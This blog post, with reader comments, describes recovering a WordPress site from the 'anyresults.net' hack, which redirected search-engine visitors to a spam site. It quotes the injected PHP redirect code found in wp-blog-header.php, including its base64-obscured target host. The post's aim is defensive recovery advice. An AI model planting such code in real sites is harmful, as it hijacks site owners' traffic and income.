Pin It
Want a mentor? I have been a happy member of Solo Masterminds for years...
Powered by MaxBlogPress  

Help for the anyresults.net Hack

My biggest blog was hacked recently. I “should” have caught on to it much more quickly but I didn’t. When traffic dropped by about 1000 people a day and my income majorly plummeted I started to take notice but I was at a loss as to how to explain it. I did see a serious lack of Google traffic so I thought maybe I got slapped for some reason. I don’t utilize any blackhat SEO methods but my content has been getting ripped off and republished left and right lately. My SERPs remained the same though, so I was VERY confused.

Then a blog reader mentioned to me that when she clicked on a link to my blog in the Google reader she would be redirected to a site called anyresults.net. She even researched it a bit and sent me a link to a discussion about this very issue. It is a hack affecting thousands of WordPress blogs. Basically it steals all of your search engine traffic…via AOL, Google, Yahoo, MSN, you name it. If a search result brings up a link to your site the visitor would be redirected to anyresults.net and not your site. I erased my cookies and tried it myself and sure enough I was redirected every time. I could even search for my blog by name and be redirected. By now I was FURIOUS. I lost some major moola this week because some jerk-off stole traffic that should have been mine…Adsense, affiliate income, ad networks…all were suffering.

After I started looking for solutions I also found some people saying that Google ended up banning them for redirecting to a spam site! They got hacked and then slapped…talk about and insult after injury.

To get rid of the hack I tried the “solution” found here. It was useless. Mostly this thread seems full of people who assume you were to stupid to upgrade and that is why you got hacked. I was hacked while running the latest version, 2.5.1, so there goes that theory. I looked in my MySQL database for image being used as a plugin and there wasn’t one. I also deleted this string: rss_f541b3abd05e7962fcab37737f40fad8. It did nothing. I even deactivated all plugins and the problem was still there so clearly it is NOT a plugin issue.

Just like this blogger I did find this code in my wp-blog-header.php file:

 ?php \
$seref=array(“google”,”msn”,”live”,”altavista”,”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser=”1″; break; }
if($ser==”1″ && sizeof($_COOKIE)==0){ header(“Location: http://”.base64_decode(“YW55cmVzdWx0cy5uZXQ=”).”/”); exit; }?>

This is NOT supposed to be there. I deleted it but this in itself did not fix the issue. So I copied over all the files in the main WP directory with fresh, clean files and the problem was fixed. I wish I had known about this before I scoured my database and reinstalled a clean version of each plugin. Hope it helps some others affected by this attack.

While I was working this out I also added a blank index file to my plugins folder so people can’t see what plugins I am using and to find back doors. I also deleted all of my users and checked my permission settings. Hopefully my traffic will get back to normal and I can avoid further attacks…what a major pain in the neck.

Now I need to check out all my other blogs.

Comments

  1. Carrie Lauth says:

    wow Tiffany. That’s scary – but glad you got it worked out and thanks for sharing this. What do you suppose can be done, if anything, to prevent this issue?

    Would a more frequent password reset do it? Or is it someone that can get around even that?

    Carrie Lauth’s last blog post..Are There Cons to Being a Work At Home Mom?

  2. WordPress claims that on older versions of WP someone only need register for a user account (which anyone can do) to have access to hack. They inist someone must have hacked weeks ago before I upgraded and then only decided to start profiting now. I have my doubts.

    I did change my password though.

  3. Thanks for posting this. It helped me track down problems on many of my own sites. After trial and error, I figured out that wp-blog-header.php is the culprit in the WP directory, but this hack leaves plenty of malicious footprints. My methods here:

    http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/

    Thanks!

  4. Hey Tiffany, so sorry this had to happen and glad you have cleaned it up. Just wanted to add one more thought. Although this sounds like a WP vulnerability but based on my experience it could be something else too.

    For example keystroke loggers. People gain access to your FTP and cPanel access after logging the username and passwords on a vulnerable computer. I blogged about that once and will be glad to send you the URL if you want.

    Lynette Chandler’s last blog post..WordPress Does Not Like Special Characters

  5. Raza Virk says:

    plz help me my this ID was hacked some one plz help me what
    can i do now

Trackbacks

  1. [...] recent anyresults.net hack to one of my blogs really made me evaluate a traffic strategy that does not include search engines, [...]

  2. [...] Tiffany Washko – Help for the anyresults.net Hack [...]

  3. [...] have had a rough month being a WAHM this month. If you recall my blog was hacked and my search engine traffic was being redirected to a spammer site. I thought that was the end of [...]

Speak Your Mind

*

CommentLuv badge